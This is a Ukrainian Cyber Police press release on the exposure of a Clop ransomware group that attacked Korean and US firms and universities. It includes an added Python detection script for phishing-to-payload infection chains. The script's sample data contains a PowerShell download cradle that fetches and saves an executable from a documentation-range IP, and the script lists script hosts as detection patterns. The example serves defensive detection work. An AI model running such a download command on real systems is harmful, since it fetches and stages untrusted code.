Cyberpolice exposed hacker group in spreading encryption virus and causing foreign companies half a billion dollars in damage

16.06.2021 11:39

Using the “Clop” ransomware, the defendants encrypted data held on the storage media of companies in the Republic of Korea and the United States, and then demanded money to restore access.

The hacker group was exposed by officers of the Cyber Police Department together with the Main Investigation Department of the National Police. The attackers were identified as part of an international operation conducted jointly with law enforcement agencies of the Republic of Korea and the United States of America.

It was established that the six defendants carried out ransomware attacks on the servers of US and Korean companies. They demanded a “ransom” for decrypting the data and, in case of non-payment, threatened to disclose the victims' confidential data.

In 2019, four Korean companies were attacked with the Clop ransomware, as a result of which 810 internal servers and employee personal computers were locked. The hackers sent emails with a malicious attachment to the inboxes of company employees. Once the infected file was opened, it downloaded additional programs in stages from a distribution server and completed the infection of the victims' computers with the remote-access trojan “FlawedAmmyy RAT”.

Using this remote access, the defendants deployed the “Cobalt Strike” toolkit, which was used to identify vulnerabilities on the infected servers and subsequently take control of them. For decrypting the information, the attackers received a “ransom” in cryptocurrency.
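The infection chain described in the two paragraphs above (a phishing attachment, staged downloads from a distribution server, then a remote-access tool launched from a user-writable location) is the kind of sequence that endpoint process-creation telemetry can surface. The following Python is an added example written for this page; it is not part of the press release and does not describe any tool used by the Cyber Police. It walks parent/child relationships over a handful of constructed process-creation events (hostnames, PIDs, user names, paths and the 192.0.2.10 address are all made up), applies three rules, and reports hosts on which more than one rule fires.

```python
"""Flag staged Office-document infection chains in process-creation logs.

Added example for this page; the events below are constructed, not real telemetry.
"""
from collections import defaultdict

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# Directories an unprivileged user can write to; a second-stage binary run from
# one of these by a descendant of an Office process is the tell-tale step.
WRITABLE_DIRS = ("\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\")

# Constructed sample events: one infected workstation and one with benign noise.
EVENTS = [
    {"host": "ws-17", "pid": 4120, "ppid": 880, "image": "outlook.exe", "cmdline": "outlook.exe"},
    {"host": "ws-17", "pid": 5200, "ppid": 4120, "image": "winword.exe",
     "cmdline": "winword.exe /n C:\\Users\\ivanova\\AppData\\Local\\Temp\\invoice_2019.doc"},
    {"host": "ws-17", "pid": 5388, "ppid": 5200, "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
                "'http://192.0.2.10/update.exe','C:\\Users\\Public\\update.exe')"},
    {"host": "ws-17", "pid": 5402, "ppid": 5388, "image": "update.exe",
     "cmdline": "C:\\Users\\Public\\update.exe"},
    # Benign host: Word and an admin script both started from Explorer, not from each other.
    {"host": "ws-03", "pid": 1200, "ppid": 900, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"host": "ws-03", "pid": 1300, "ppid": 1200, "image": "winword.exe", "cmdline": "winword.exe"},
    {"host": "ws-03", "pid": 1400, "ppid": 1200, "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
]


def build_index(events):
    """Map (host, pid) -> event so that parent chains can be walked."""
    return {(e["host"], e["pid"]): e for e in events}


def ancestors(event, index):
    """Yield parent, grandparent, ... until the chain leaves the log (cycle-safe)."""
    seen = set()
    cur = index.get((event["host"], event["ppid"]))
    while cur is not None and (cur["host"], cur["pid"]) not in seen:
        seen.add((cur["host"], cur["pid"]))
        yield cur
        cur = index.get((cur["host"], cur["ppid"]))


def classify(event, index):
    """Return the names of the rules this event trips (empty list if none)."""
    hits = []
    img = event["image"].lower()
    cmd = event["cmdline"].lower()
    parent = index.get((event["host"], event["ppid"]))
    office_parent = parent is not None and parent["image"].lower() in OFFICE_APPS
    office_ancestor = any(a["image"].lower() in OFFICE_APPS for a in ancestors(event, index))

    # Rule 1: an Office application directly launching a script host or LOLBin.
    if img in SCRIPT_HOSTS and office_parent:
        hits.append("office_spawns_script_host")
    # Rule 2: a script host fetching something over HTTP(S) on the command line.
    if img in SCRIPT_HOSTS and "http" in cmd and any(k in cmd for k in ("download", "iex", "invoke-")):
        hits.append("download_cradle")
    # Rule 3: a non-Office, non-script binary in a user-writable path, descended from Office.
    if office_ancestor and img not in SCRIPT_HOSTS and img not in OFFICE_APPS \
            and any(d in cmd for d in WRITABLE_DIRS):
        hits.append("payload_from_writable_path")
    return hits


def detect_chains(events):
    """Collect (rule, pid) hits per host."""
    index = build_index(events)
    per_host = defaultdict(list)
    for e in events:
        for rule in classify(e, index):
            per_host[e["host"]].append((rule, e["pid"]))
    return dict(per_host)


def suspicious_hosts(events, min_rules=2):
    """Hosts where at least `min_rules` distinct rules fired: likely a staged chain, not noise."""
    return sorted(h for h, hits in detect_chains(events).items()
                  if len({rule for rule, _ in hits}) >= min_rules)


if __name__ == "__main__":
    for host, hits in detect_chains(EVENTS).items():
        print(host, hits)
    print("suspicious:", suspicious_hosts(EVENTS))
```

Requiring two distinct rules per host is what keeps the benign workstation quiet: an administrator running PowerShell from Explorer trips nothing, and even a single rule firing alone (Word spawning cmd.exe for a legitimate macro, say) stays below the threshold, whereas the attachment-to-downloader-to-payload sequence trips all three.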

In 2021, defendants carried out an attack and encrypted employee personal data and financial reports of Stanford University School of Medicine, the University of Maryland, and the University of California.

Unlike common ransomware attacks that encrypt large numbers of unidentified personal computers and servers, this is an APT (Advanced Persistent Threat) attack, which targets a specific victim's computer network and infects the entire system with ransomware.

The total amount of damage reaches 500 million dollars.

Through the joint efforts of law enforcement, the infrastructure used to distribute the ransomware was taken down and the channels used to launder the criminally obtained cryptocurrency were blocked.

Law enforcement officers conducted 21 searches in the capital and the Kyiv region, at the defendants' homes and in their cars. The Tactical and Operational Response unit of the Patrol Police took part in the searches. Computer equipment, cars and about 5 million hryvnias in cash were seized, and the suspects' property was placed under arrest.

Criminal proceedings have been opened under Part 2 of Art. 361 (Unauthorized interference in the operation of computers, automated systems, computer networks or telecommunication networks) and Part 2 of Art. 209 (Legalization (laundering) of property obtained by criminal means) of the Criminal Code of Ukraine. The defendants face up to eight years in prison. Investigative actions are ongoing.

Procedural guidance is carried out by the Office of the Prosecutor General of Ukraine.

Cyber Police Department of the National Police of Ukraine
